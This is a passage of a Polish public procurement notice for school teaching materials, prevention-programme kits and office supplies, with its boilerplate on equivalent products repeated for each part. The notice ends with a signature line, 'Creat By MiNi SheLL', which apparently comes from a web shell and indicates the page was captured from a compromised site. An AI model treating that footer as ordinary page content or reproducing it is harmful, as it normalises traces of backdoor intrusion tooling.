Zastosowanie rozwiązań alternatywnych musi zostać zaakceptowane przez Zamawiającego nie później niż na etapie badania ofert. Zamawiający dopuszcza oferowanie przez wykonawców innych produktów równoważnych tzn. takich, które posiadają co najmniej takie same parametry techniczne, zespół funkcji użytkowych czy zakres tematyczny i merytoryczny. W przypadku zastosowania produktów równoważnych, produkt musi być równoważny dla wszystkich cech produktu bazowego, również tych z powodów technicznych nie umieszczonych w szczegółowym opisie, a mogących mieć znaczenie przy określaniu stopnia parametrów i cech wymaganych przez Zamawiającego. Równoważność proponowanych produktów będzie podlegać ocenie Zamawiającego na podstawie przekazanych przez Wykonawców dokumentów. W przypadku wątpliwości Wykonawcy zobowiązani są do składania zapytań przed terminem składania ofert. Odpowiedzi Zamawiającego są wiążące dla wszystkich Wykonawców. Za ostateczną wykładnię parametrów odpowiadających wymaganiom przyjmuje się wykładnię Zamawiającego. Jeżeli w ocenie zamawiającego produkt wskazany jako równoważny nie spełni ogółu stawianych wymagań zostanie uznany za nieodpowiadający wymaganiom określonym w zamówieniu. Zamawiający może żądać dodatkowych dokumentów potwierdzających spełnianie przez oferowane produkty oczekiwanych standardów, jeśli na podstawie dokumentów dołączonych do oferty zamawiający nie będzie mógł ocenić stopnia równoważności produktu. Równoważność produktu musi również odpowiadać zakresowi treści merytorycznych. Zamawiający będzie oceniał równoważność produktów ( w szczególności podręczników) względem produktu bazowego, w celu zgodności z programami zajęć edukacyjnych przygotowanymi przez prowadzących. 
Zdanie Zamawiającego jest decydujące w uznaniu czy produkt spełnia w 100% wszystkie parametry wskazanego produktu bazowego. Wykonawca musi dysponować i na wezwanie Zamawiającego przekazać potwierdzone kserokopie certyfikatów na wszystkie zamawiane pomoce dydaktyczne, które zgodnie z obowiązującymi przepisami, będą wykorzystane w edukacji dzieci i młodzieży. Zamawiający może żądać od Wykonawcy przekazania szczegółowego opisu produktu, atestów i certyfikatów w celu zbadania czy oferowane produktu odpowiadają wymaganiom Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w zależności od posiadanych środków finansowych. Wielkość dostaw do niezwłocznej realizacji jest uzależniona od wielkości przekazanych do dyspozycji zamawiającego transzy dofinansowanie projektu. Rozliczenie z Wykonawcą będzie następować za zrealizowane dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.22.00-7, 22.11.10.00-1, 22.83.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materiały dydaktyczne i pomoce edukacyjne do zajęć dydaktyczno - wyrównawczych (j. polski, j. angielski, historia); ścisłe (matematyka, fizyka, chemia), przyrodnicze (biologia, geografia); nauczanie wczesnoszkolne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz.	Wyszczególnienie	j.m	Ilość 
4.101	Materiały dydaktyczne (Multimedialny świat Jana Brzechwy) do zajęć dydaktyczno - wyrównawczych z j. polskiego szkoła podstawowa	Szt. 	3
4.102	Materiały dydaktyczne (program multimedialny eduROM pakiet klasowy dla szkoły podstawowej) do zajęć dydaktyczno - wyrównawczych z j. polskiego szkoła podstawowa	Szt. 	3
4.103	Materiały dydaktyczne (zestaw plansz do nauki języka polskiego ) do zajęć dydaktyczno - wyrównawczych z j. polskiego szkoła podstawowa	Szt. 	3
4.104	Materiały dydaktyczne (podręcznik, ćwiczenia i inne ) dla uczniów/ uczennic do zajęć dydaktyczno - wyrównawczych z j. polskiego gimnazjum	Zestaw 	66
4.105	Materiały dydaktyczne (podręcznik, ćwiczenia i inne ) dla nauczycieli/ ek do zajęć dydaktyczno - wyrównawczych z j. polskiego gimnazjum	Zestaw 	3
4.108	Materiały dydaktyczne (podręcznik, ćwiczenia i inne ) dla uczniów/ uczennic do zajęć dydaktyczno - wyrównawczych z j. angielskiego gimnazjum	Zestaw 	37
4.109	Materiały dydaktyczne (podręcznik, ćwiczenia i inne ) nauczycieli/ ek do zajęć dydaktyczno - wyrównawczych z j. angielskiego gimnazjum	Zestaw 	3
4.112	Materiały dydaktyczne (podręcznik, ćwiczenia i inne ) dla uczniów/ uczennic do zajęć dydaktyczno - wyrównawczych z historii gimnazjum	Zestaw	12
4.113	Materiały dydaktyczne (podręcznik, ćwiczenia i inne ) dla nauczycieli/ ek do zajęć dydaktyczno - wyrównawczych z historii gimnazjum	Zestaw 	1
4.116	Materiały dydaktyczne (zestaw przyborów i tablic matematycznych)  do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły podstawowe	Zestaw 	3
4.117	Materiały dydaktyczne (zestaw ułamków magnetycznych)  do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły podstawowe	Zestaw 	3
4.118	Materiały dydaktyczne (magnetyczny zestaw dziesiętny)  do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły podstawowe	Szt.	3
4.119	Materiały dydaktyczne (program multimedialny eduROM - pakiet przedmiotowy matematyka)  do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły podstawowe	Szt. 	3
4.120	Materiały dydaktyczne (oś liczbowa magnetyczna)  do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły podstawowe	Szt. 	3
4.121	Materiały dydaktyczne (zestaw gier matematyczno - logicznych)  do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły podstawowe	Zestaw 	3
4.122	Materiały dydaktyczne (podręcznik, ćwiczenia i inne)  do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły gimnazjalne 	Zestaw 	76
4.123	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla nauczycieli/ ek do zajęć dydaktyczno - wyrównawczych z matematyki 3 szkoły gimnazjalne	Zestaw 	3
4.126	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla uczniów/ uczennic do zajęć dydaktyczno - wyrównawczych z fizyki 1 szkoła gimnazjalna	Zestaw 	16
4.127	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla nauczyciela/ ki do zajęć dydaktyczno - wyrównawczych z fizyki 1 szkoła gimnazjalna	Zestaw 	1
4.130	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla uczniów/ uczennic do zajęć dydaktyczno - wyrównawczych z chemii - 1 szkoła gimnazjalna	Zestaw 	16
4.131	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla nauczyciela/ ki do zajęć dydaktyczno - wyrównawczych z chemii - 1 szkoła gimnazjalna	Zestaw 	1
4.134	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla uczniów/ uczennic do zajęć dydaktyczno - wyrównawczych z biologii- 1 szkoła gimnazjalna	Zestaw 	12
4.135	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla nauczyciela/ ki do zajęć dydaktyczno - wyrównawczych z biologii- 1 szkoła gimnazjalna	Zestaw 	1
4.138	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla uczniów/ uczennic do zajęć dydaktyczno - wyrównawczych z geografii- 1 szkoła gimnazjalna	Zestaw 	11
4.139	Materiały dydaktyczne (podręcznik, ćwiczenia i inne) dla nauczyciela/ ki do zajęć dydaktyczno - wyrównawczych z geografii 1 szkoła gimnazjalna	Zestaw 	1
4.142	Materiały dydaktyczne (galeria wielofunkcyjna)  do zajęć dydaktyczno - wyrównawczych z nauczania wczesnoszkolnego 	Szt. 	3
4.143	Materiały dydaktyczne (zestaw plansz do nauczania zintegrowanego)  do zajęć dydaktyczno - wyrównawczych z nauczania wczesnoszkolnego	Szt. 	3

Ze względu na złożoność, bardzo szeroki zakres opisywanych towarów i szczególny charakter zamówienia, parametry zamawianych pomocy zostały szczegółowo opisane w formularzach cenowych dla poszczególnych części. Użyte w szczegółowym opisie nazwy produktów zostały zastosowane w celu zaprezentowania wymaganych parametrów użytkowych sprzętu i towarów. W celu przedstawienia cech poszczególnych materiałów w opisie użyto nazw produktów powszechnie dostępnych na rynku. Użycie konkretnych nazw i symboli zostało zastosowanie dla przedstawienia zespołu właściwości, cech i funkcjonalności wymaganych przez zamawiającego. Zamawiający dopuszcza zastosowanie równoważnego sprzętu innych producentów pod warunkiem, że ich parametry odpowiadają przykładom przedstawionym przez Zamawiającego. 
Zastosowanie rozwiązań alternatywnych musi zostać zaakceptowane przez Zamawiającego nie później niż na etapie badania ofert. Zamawiający dopuszcza oferowanie przez wykonawców innych produktów równoważnych tzn. takich, które posiadają co najmniej takie same parametry techniczne, zespół funkcji użytkowych czy zakres tematyczny i merytoryczny. W przypadku zastosowania produktów równoważnych, produkt musi być równoważny dla wszystkich cech produktu bazowego, również tych z powodów technicznych nie umieszczonych w szczegółowym opisie, a mogących mieć znaczenie przy określaniu stopnia parametrów i cech wymaganych przez Zamawiającego. Równoważność proponowanych produktów będzie podlegać ocenie Zamawiającego na podstawie przekazanych przez Wykonawców dokumentów. W przypadku wątpliwości Wykonawcy zobowiązani są do składania zapytań przed terminem składania ofert. Odpowiedzi Zamawiającego są wiążące dla wszystkich Wykonawców. Za ostateczną wykładnię parametrów odpowiadających wymaganiom przyjmuje się wykładnię Zamawiającego. Jeżeli w ocenie zamawiającego produkt wskazany jako równoważny nie spełni ogółu stawianych wymagań zostanie uznany za nieodpowiadający wymaganiom określonym w zamówieniu. Zamawiający może żądać dodatkowych dokumentów potwierdzających spełnianie przez oferowane produkty oczekiwanych standardów, jeśli na podstawie dokumentów dołączonych do oferty zamawiający nie będzie mógł ocenić stopnia równoważności produktu. Równoważność produktu musi również odpowiadać zakresowi treści merytorycznych. Zamawiający będzie oceniał równoważność produktów ( w szczególności podręczników) względem produktu bazowego, w celu zgodności z programami zajęć edukacyjnych przygotowanymi przez prowadzących. 
Zdanie Zamawiającego jest decydujące w uznaniu czy produkt spełnia w 100% wszystkie parametry wskazanego produktu bazowego. Wykonawca musi dysponować i na wezwanie Zamawiającego przekazać potwierdzone kserokopie certyfikatów na wszystkie zamawiane pomoce dydaktyczne, które zgodnie z obowiązującymi przepisami, będą wykorzystane w edukacji dzieci i młodzieży. Zamawiający może żądać od Wykonawcy przekazania szczegółowego opisu produktu, atestów i certyfikatów w celu zbadania czy oferowane produktu odpowiadają wymaganiom Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w zależności od posiadanych środków finansowych. Wielkość dostaw do niezwłocznej realizacji jest uzależniona od wielkości przekazanych do dyspozycji zamawiającego transzy dofinansowanie projektu. Rozliczenie z Wykonawcą będzie następować za zrealizowane dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.22.00-7, 22.11.10.00-1, 22.83.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Materiały dydaktyczne do realizacji programów prewencyjnych w szkołach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz.	Wyszczególnienie	j.m	Ilość 
6.149	Materiały dydaktyczne ( zestaw składający się z materiałów multimedialnych między innymi konspektów, filmów pokazowych, prezentacji multimedialnych)	Zestaw  	34
5.150	Materiały dydaktyczne ( zestaw dotyczący tematyki równościowej składający się między innymi z książek, broszur, filmów, gier)	Zestaw 	3

Ze względu na złożoność, bardzo szeroki zakres opisywanych towarów i szczególny charakter zamówienia, parametry zamawianych pomocy zostały szczegółowo opisane w formularzach cenowych dla poszczególnych części. Użyte w szczegółowym opisie nazwy produktów zostały zastosowane w celu zaprezentowania wymaganych parametrów użytkowych sprzętu i towarów. W celu przedstawienia cech poszczególnych materiałów w opisie użyto nazw produktów powszechnie dostępnych na rynku. Użycie konkretnych nazw i symboli zostało zastosowanie dla przedstawienia zespołu właściwości, cech i funkcjonalności wymaganych przez zamawiającego. Zamawiający dopuszcza zastosowanie równoważnego sprzętu innych producentów pod warunkiem, że ich parametry odpowiadają przykładom przedstawionym przez Zamawiającego. 

Zastosowanie rozwiązań alternatywnych musi zostać zaakceptowane przez Zamawiającego nie później niż na etapie badania ofert. Zamawiający dopuszcza oferowanie przez wykonawców innych produktów równoważnych tzn. takich, które posiadają co najmniej takie same parametry techniczne, zespół funkcji użytkowych czy zakres tematyczny i merytoryczny. W przypadku zastosowania produktów równoważnych, produkt musi być równoważny dla wszystkich cech produktu bazowego, również tych z powodów technicznych nie umieszczonych w szczegółowym opisie, a mogących mieć znaczenie przy określaniu stopnia parametrów i cech wymaganych przez Zamawiającego. Równoważność proponowanych produktów będzie podlegać ocenie Zamawiającego na podstawie przekazanych przez Wykonawców dokumentów. W przypadku wątpliwości Wykonawcy zobowiązani są do składania zapytań przed terminem składania ofert. Odpowiedzi Zamawiającego są wiążące dla wszystkich Wykonawców. Za ostateczną wykładnię parametrów odpowiadających wymaganiom przyjmuje się wykładnię Zamawiającego. Jeżeli w ocenie zamawiającego produkt wskazany jako równoważny nie spełni ogółu stawianych wymagań zostanie uznany za nieodpowiadający wymaganiom określonym w zamówieniu. Zamawiający może żądać dodatkowych dokumentów potwierdzających spełnianie przez oferowane produkty oczekiwanych standardów, jeśli na podstawie dokumentów dołączonych do oferty zamawiający nie będzie mógł ocenić stopnia równoważności produktu. Równoważność produktu musi również odpowiadać zakresowi treści merytorycznych. Zamawiający będzie oceniał równoważność produktów ( w szczególności podręczników) względem produktu bazowego, w celu zgodności z programami zajęć edukacyjnych przygotowanymi przez prowadzących. 
Zdanie Zamawiającego jest decydujące w uznaniu czy produkt spełnia w 100% wszystkie parametry wskazanego produktu bazowego. Wykonawca musi dysponować i na wezwanie Zamawiającego przekazać potwierdzone kserokopie certyfikatów na wszystkie zamawiane pomoce dydaktyczne, które zgodnie z obowiązującymi przepisami, będą wykorzystane w edukacji dzieci i młodzieży. Zamawiający może żądać od Wykonawcy przekazania szczegółowego opisu produktu, atestów i certyfikatów w celu zbadania czy oferowane produktu odpowiadają wymaganiom Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w zależności od posiadanych środków finansowych. Wielkość dostaw do niezwłocznej realizacji jest uzależniona od wielkości przekazanych do dyspozycji zamawiającego transzy dofinansowanie projektu. Rozliczenie z Wykonawcą będzie następować za zrealizowane dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.22.00-6, 39.16.22.00-7, 22.11.10.00-1, 22.83.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pomoce dydaktyczne między innymi tonery, papier ksero, mazaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszczególnienie	j.m	Ilość 
Zestaw oryginalnych tonerów do drukarek Canon MF4690 PL stosowanych w miejscach realizacji projektu	Szt. 	16
Papier do drukarek (ryza) A4, 80g/m2, do drukarek laserowych	Ryza  	400
Mazaki 	Szt. 	100

Ze względu na złożoność, bardzo szeroki zakres opisywanych towarów i szczególny charakter zamówienia, parametry zamawianych pomocy zostały szczegółowo opisane w formularzach cenowych dla poszczególnych części. Użyte w szczegółowym opisie nazwy produktów zostały zastosowane w celu zaprezentowania wymaganych parametrów użytkowych sprzętu i towarów. W celu przedstawienia cech poszczególnych materiałów w opisie użyto nazw produktów powszechnie dostępnych na rynku. Użycie konkretnych nazw i symboli zostało zastosowanie dla przedstawienia zespołu właściwości, cech i funkcjonalności wymaganych przez zamawiającego. Zamawiający dopuszcza zastosowanie równoważnego sprzętu innych producentów pod warunkiem, że ich parametry odpowiadają przykładom przedstawionym przez Zamawiającego. 

Zastosowanie rozwiązań alternatywnych musi zostać zaakceptowane przez Zamawiającego nie później niż na etapie badania ofert. Zamawiający dopuszcza oferowanie przez wykonawców innych produktów równoważnych tzn. takich, które posiadają co najmniej takie same parametry techniczne, zespół funkcji użytkowych czy zakres tematyczny i merytoryczny. W przypadku zastosowania produktów równoważnych, produkt musi być równoważny dla wszystkich cech produktu bazowego, również tych z powodów technicznych nie umieszczonych w szczegółowym opisie, a mogących mieć znaczenie przy określaniu stopnia parametrów i cech wymaganych przez Zamawiającego. Równoważność proponowanych produktów będzie podlegać ocenie Zamawiającego na podstawie przekazanych przez Wykonawców dokumentów. W przypadku wątpliwości Wykonawcy zobowiązani są do składania zapytań przed terminem składania ofert. Odpowiedzi Zamawiającego są wiążące dla wszystkich Wykonawców. Za ostateczną wykładnię parametrów odpowiadających wymaganiom przyjmuje się wykładnię Zamawiającego. Jeżeli w ocenie zamawiającego produkt wskazany jako równoważny nie spełni ogółu stawianych wymagań zostanie uznany za nieodpowiadający wymaganiom określonym w zamówieniu. Zamawiający może żądać dodatkowych dokumentów potwierdzających spełnianie przez oferowane produkty oczekiwanych standardów, jeśli na podstawie dokumentów dołączonych do oferty zamawiający nie będzie mógł ocenić stopnia równoważności produktu. Równoważność produktu musi również odpowiadać zakresowi treści merytorycznych. Zamawiający będzie oceniał równoważność produktów ( w szczególności podręczników) względem produktu bazowego, w celu zgodności z programami zajęć edukacyjnych przygotowanymi przez prowadzących. 
Zdanie Zamawiającego jest decydujące w uznaniu czy produkt spełnia w 100% wszystkie parametry wskazanego produktu bazowego. Wykonawca musi dysponować i na wezwanie Zamawiającego przekazać potwierdzone kserokopie certyfikatów na wszystkie zamawiane pomoce dydaktyczne, które zgodnie z obowiązującymi przepisami, będą wykorzystane w edukacji dzieci i młodzieży. Zamawiający może żądać od Wykonawcy przekazania szczegółowego opisu produktu, atestów i certyfikatów w celu zbadania czy oferowane produktu odpowiadają wymaganiom Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w zależności od posiadanych środków finansowych. Wielkość dostaw do niezwłocznej realizacji jest uzależniona od wielkości przekazanych do dyspozycji zamawiającego transzy dofinansowanie projektu. Rozliczenie z Wykonawcą będzie następować za zrealizowane dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com